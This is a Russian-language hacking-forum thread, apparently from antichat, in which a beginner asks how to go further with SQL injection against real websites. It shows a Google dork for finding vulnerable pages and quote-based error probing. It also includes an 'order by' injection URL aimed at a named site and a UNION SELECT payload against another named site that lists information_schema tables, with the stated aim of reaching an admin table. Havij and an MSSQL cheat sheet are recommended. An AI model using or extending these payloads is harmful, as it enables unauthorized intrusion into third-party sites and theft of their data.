Всем привет такой вопрос прочитал много информации про SQL вот что как я делаю

1. захожу на google в поиске вбиваю такой запрос inurl:".php?id=14"

2. далее открываются сайты и я начинаю клацать по каждому и в конце название любого сайта подставлять кавычку '

3.нашел сайт с ошибкой данного рода

Microsoft OLE DB Provider for ODBC Drivers error '80040e21'

ODBC driver does not support the requested properties.

/_Include/db/colArray.vbs, line 12

http://www.goodomsk.ru/FO/catalog.asp?id=14&door=280++order+by+20/*


но не могу могу дальше раскрутить уязвимость сайта а точнее сколько полей или я что то не так делаю подскажите знающие люди

тут же MSSQL

http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

А морковкой пробовал он же хэвйвидж?

hranitel said:
↑ (https://antichat.live/posts/3916193/)
А морковкой пробовал он же хэвйвидж?


Морковка уже не фришная, поэтому не подойдет. Попробовал покрутить и ничего не вышло. Пофиксили понял.

Регнут давно, а +5 репы нет. Придется как-то заработать теперь, не знаю, как это сделать.

АДМИНЫ! Знакомый спросил, почему он регнулся, а у него нет возможности писать в песочнице? (У вас нет прав для ответа в этой теме)

http://www.c2-int.com/news-full.php...1,12,13,14+from+information_schema.tabl es+--+ (http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12,13,14+from+information_schema.tables+--+)

далее куда таблицу вставлять допустим АДМИН есть куда ее сувать и для чего в конце я ставлю +--+ какую роль играют ???

я понял )